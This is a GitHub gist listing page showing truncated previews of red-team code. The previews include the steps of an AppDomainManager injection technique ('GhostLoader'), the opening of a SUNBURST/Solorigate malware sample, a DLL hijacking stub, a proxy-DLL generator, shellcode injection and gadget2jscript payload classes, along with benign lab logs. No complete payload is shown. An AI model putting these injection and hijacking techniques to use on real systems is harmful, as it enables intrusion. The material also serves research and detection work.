GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
David kafkaesqu3
kafkaesqu3
/ OrionImprovementBusinessLayer.cs
Created
December 19, 2020 04:03
solorigate sample with unobfuscated strings https://raw.githubusercontent.com/fireeye/sunburst_countermeasures/main/fnv1a_xor_hashes.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //for i in `cat fnv1a_xor_hashes.txt`; do | |
| //lookup=`echo $i | cut -d "," -f 2` | |
| //retn=`echo $i | cut -d "," -f 1` | |
| //sed -i "s/$lookup/\"$retn\"/g" OrionImprovementBusinessLayer.cs | |
| //done | |
| using System; | |
| using System.Collections.Generic; | |
| using System.Configuration; |
kafkaesqu3
/ main.cpp
Created
December 18, 2020 16:00
— forked from monoxgas/main.cpp
Adapative DLL Hijacking - Stability Hooking
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <intrin.h> | |
| #include <string> | |
| #include <TlHelp32.h> | |
| #include <psapi.h> | |
| DWORD WINAPI Thread(LPVOID lpParam) { | |
| // Insert evil stuff | |
| ExitProcess(0); |
kafkaesqu3
/ make_pragma.py
Created
December 18, 2020 15:33
Python script which uses dumpbin to print pragma directives for DLL export forwarding to another DLL
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| This script generates a function forwarding header | |
| for proxy DLL generation. | |
| It is expected that DUMPBIN.EXE is in the path. | |
| """ | |
| import logging as l | |
| import optparse | |
| import os | |
| import os.path |
kafkaesqu3
/ http_get.swift
Last active
September 30, 2020 20:32
demonstration of HTTP GET requests in swift
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // main.swift | |
| // HTTPGet | |
| // | |
| // Created by david on 9/30/20. | |
| // | |
| import Foundation | |
| func async_req() -> Void { |
kafkaesqu3
/ CreateThread_ShellcodeInjection.cs
Last active
October 19, 2023 23:54
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| namespace Inject | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { | |
| byte[] shellcode; |
kafkaesqu3
/ gadget2jscriptQueueAPCInject.cs
Created
May 29, 2020 18:28
— forked from rvrsh3ll/gadget2jscriptQueueAPCInject.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Runtime.InteropServices; | |
| using System.Net; | |
| using System.IO.Compression; | |
| public class Payload | |
| { |
kafkaesqu3
/ blockdlls_gadget2jscript.cs
Created
May 1, 2020 13:31
— forked from rvrsh3ll/blockdlls_gadget2jscript.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.IO.Compression; | |
| using System.Runtime.InteropServices; | |
| public class Payload | |
| { | |
| public Payload() |
kafkaesqu3
/ _Instructions_Reproduce.md
Created
April 30, 2020 01:06
GhostLoader - AppDomainManager - Injection - 攻壳机动队
kafkaesqu3
/ vagrant_up_logger.log
Created
December 24, 2019 04:59
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Bringing machine 'logger' up with 'vmware_desktop' provider... | |
| ==> logger: Cloning VMware VM: 'bento/ubuntu-16.04'. This can take some time... | |
| ==> logger: Checking if box 'bento/ubuntu-16.04' version '201808.24.0' is up to date... | |
| ==> logger: A newer version of the box 'bento/ubuntu-16.04' for provider 'vmware_desktop' is | |
| ==> logger: available! You currently have version '201808.24.0'. The latest is version | |
| ==> logger: '201912.04.0'. Run `vagrant box update` to update. | |
| ==> logger: Verifying vmnet devices are healthy... | |
| ==> logger: Preparing network adapters... | |
| ==> logger: Starting the VMware VM... | |
| ==> logger: Waiting for the VM to receive an address... |
kafkaesqu3
/ vagrant_up_wef.log
Created
December 24, 2019 04:59
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Bringing machine 'wef' up with 'vmware_desktop' provider... | |
| ==> wef: Cloning VMware VM: 'detectionlab/win2016'. This can take some time... | |
| ==> wef: Checking if box 'detectionlab/win2016' version '1.4' is up to date... | |
| ==> wef: Verifying vmnet devices are healthy... | |
| ==> wef: Preparing network adapters... | |
| WARNING: The VMX file for this box contains a setting that is automatically overwritten by Vagrant | |
| WARNING: when started. Vagrant will stop overwriting this setting in an upcoming release which may | |
| WARNING: prevent proper networking setup. Below is the detected VMX setting: | |
| WARNING: | |
| WARNING: ethernet0.pcislotnumber = "33" |